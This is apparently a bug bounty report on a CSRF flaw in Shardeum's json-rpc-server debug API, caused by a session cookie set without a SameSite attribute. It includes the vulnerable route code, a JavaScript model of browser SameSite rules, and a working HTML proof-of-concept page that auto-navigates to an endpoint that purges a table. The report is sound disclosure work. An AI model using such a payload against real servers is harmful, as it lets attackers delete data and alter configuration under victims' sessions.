# Boost \_ Shardeum\_ Ancillaries 34367 - \[Websites and Applications - Low] CSRF vulnerability due to mi

Submitted on Sat Aug 10 2024 12:56:34 GMT-0400 (Atlantic Standard Time) by @hulkvision for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/)

Report ID: #34367

Report type: Websites and Applications

Report severity: Low

Target: <https://github.com/shardeum/json-rpc-server/tree/dev>

Impacts:

* CSRF vulnerability allowing blackhat to perform authenticated actions
* Changing sensitive details of other users (including modifying browser local storage) without already-connected wallet interaction and with up to one click of user interaction, such as: Email, Password of the victim etc.

## Description

## Brief/Intro

The `access_token` cookie is set without a `SameSite` attribute, so browsers attach it to cross-site requests. Combined with state-changing `GET` endpoints in the debug API, this is a CSRF vulnerability: any website an authenticated user visits can trigger those endpoints with the victim's cookie.

## Vulnerability Details

In `src/routes/authenticate.ts`

```
router.route('/:passphrase').get(async function (req: Request, res: Response) {
  const { passphrase } = req.params
  const payload = { user: 'shardeum-dev' }
  if (passphrase === CONFIG.passphrase) {
    // token don't expire, usually this is bad practice
    // for the case being implementing refresh token is overkill
    // stolen token worst case scenario our debug data ended up being not useful.
    const token = jwt.sign(payload, CONFIG.secret_key)
    // No `sameSite` (and no `secure`) option: the cookie is sent on cross-site
    // top-level GET navigations, which is what the CSRF proof of concept relies on.
    res.cookie('access_token', token, {
      httpOnly: false,
      maxAge: 1000 * 60 * 60 * 700, // ~ a month
    })
    return res.send({ token: token, message: 'authenticated and authorized for debug api calls' }).status(200)
  }
  // .status() after .send() has no effect in Express: the response has already
  // gone out, so a wrong passphrase is still answered with status 200.
  return res.send({ message: 'wrong passphrase' }).status(400)
})
```

After authentication the RPC server sets the `access_token` cookie without any `SameSite` restriction, so a malicious website can make the victim's browser call authenticated `GET` endpoints that perform state-changing actions such as purging tables, modifying config values and node subscription. Note that the `SameSite=Lax` default Chromium applies when the attribute is absent does not help here: Lax still sends the cookie on top-level `GET` navigations, which is exactly what the proof of concept uses, whereas `SameSite=Strict` would withhold it.
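The following is an added example, not code from the Shardeum json-rpc-server. It models the browser's SameSite decision offline so the effect of the cookie options above can be checked without a running server: `serializeCookie` approximates the `Set-Cookie` header Express's `res.cookie()` would emit for a given options object (the `HARDENED_OPTIONS` value is an assumed fix, not the project's), `parseSetCookie` reads it back, and `cookieAttached` applies the SameSite rules to a described cross-site request. The token value is a constructed placeholder.

```javascript
// Approximate the Set-Cookie header that Express's res.cookie(name, value, opts)
// produces; only the attributes relevant to the CSRF question are emitted.
function serializeCookie(name, value, opts = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (opts.maxAge !== undefined) parts.push(`Max-Age=${Math.floor(opts.maxAge / 1000)}`);
  parts.push('Path=' + (opts.path || '/'));
  if (opts.httpOnly) parts.push('HttpOnly');
  if (opts.secure) parts.push('Secure');
  if (opts.sameSite) {
    const v = String(opts.sameSite).toLowerCase();
    parts.push('SameSite=' + v.charAt(0).toUpperCase() + v.slice(1));
  }
  return parts.join('; ');
}

// Parse a Set-Cookie header into the fields the SameSite decision depends on.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    sameSite: null,
    secure: false,
    httpOnly: false,
  };
  for (const attr of attrs) {
    const [k, v] = attr.split('=');
    const key = k.toLowerCase();
    if (key === 'samesite') cookie.sameSite = (v || '').toLowerCase();
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'httponly') cookie.httpOnly = true;
  }
  return cookie;
}

// Decide whether the browser attaches `cookie` to `request`.
// Rules: Strict is never sent cross-site; Lax (and the Chromium default when the
// attribute is absent) is sent only on top-level navigations with a safe method;
// None is sent on any request but is rejected unless the cookie is also Secure.
// (Chromium's two-minute "Lax+POST" exception for freshly set cookies is ignored.)
function cookieAttached(cookie, request) {
  const { method, topLevelNavigation, sameSiteRequest } = request;
  if (sameSiteRequest) return true;
  const mode = cookie.sameSite || 'lax'; // absent attribute -> Lax by default
  if (mode === 'strict') return false;
  if (mode === 'none') return cookie.secure;
  const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'];
  return topLevelNavigation && safeMethods.includes(method.toUpperCase());
}

// Options as they appear in authenticate.ts: no sameSite, no secure.
const VULNERABLE_OPTIONS = { httpOnly: false, maxAge: 1000 * 60 * 60 * 700 };
// Assumed hardened options (an illustration, not the project's fix).
const HARDENED_OPTIONS = { httpOnly: true, secure: true, sameSite: 'strict', maxAge: 1000 * 60 * 60 * 700 };

// The proof of concept: a top-level GET navigation from the attacker's page
// (both the <a href> click and the document.location assignment are this).
const POC_NAVIGATION = { method: 'GET', topLevelNavigation: true, sameSiteRequest: false };

// Would the PoC navigation carry the access_token cookie set with `options`?
function exposed(options) {
  const header = serializeCookie('access_token', 'constructed.placeholder.token', options);
  return cookieAttached(parseSetCookie(header), POC_NAVIGATION);
}

console.log('vulnerable options, PoC navigation carries cookie:', exposed(VULNERABLE_OPTIONS)); // true
console.log('SameSite=Lax, PoC navigation carries cookie:', exposed({ sameSite: 'lax' }));   // true
console.log('hardened options, PoC navigation carries cookie:', exposed(HARDENED_OPTIONS));   // false
```

Running it shows that the original options and `SameSite=Lax` both let the proof of concept through, and only `Strict` withholds the cookie. Because that protection rests on browser defaults and on the endpoints being reachable by top-level navigation, a more robust fix is to stop performing state changes on `GET` and to accept the token from a request header (the authenticate route already returns it in the JSON body) rather than from a cookie.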

## Impact Details

* The vulnerability allows a malicious website to perform actions such as purging tables, modifying config values and node subscription with the victim's authenticated session.
* The vulnerability could result in deletion of debug data.

## References

<https://github.com/shardeum/json-rpc-server/blob/d799a64c1ab4a7cffdf472a8be689fe7afb993e9/src/routes/authenticate.ts#L15-L18>

## Proof of concept

```
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>csrf performing authenticated action</title>
</head>
<body>
  <h1>calling /log/cleanTxTable which will trigger purging of table that store transaction logging</h1>
  <!-- manual trigger: a top-level GET navigation, so the browser sends the access_token cookie -->
  <a href="http://127.0.0.1:8888/log/cleanTxTable">click here to attack</a>

  <script type="text/javascript">
    // automatic trigger: the same top-level GET navigation after three seconds
    function callAutomatically() {
      document.location = 'http://127.0.0.1:8888/log/cleanTxTable';
    }
    setTimeout(callAutomatically, 3000);
  </script>
</body>
</html>
```

## Steps to Reproduce

1. Authenticate to the RPC server by requesting the authenticate route with the configured passphrase, so the `access_token` cookie is set in the browser.
2. Save the PoC file as `csrfpoc.html`.
3. Open `csrfpoc.html` in the browser you authenticated to the RPC server with.
4. Either click `click here to attack` or wait 3 seconds for the attack to run automatically.
5. The response is `{"success":true}`, confirming that `/log/cleanTxTable` ran with the victim's cookie.
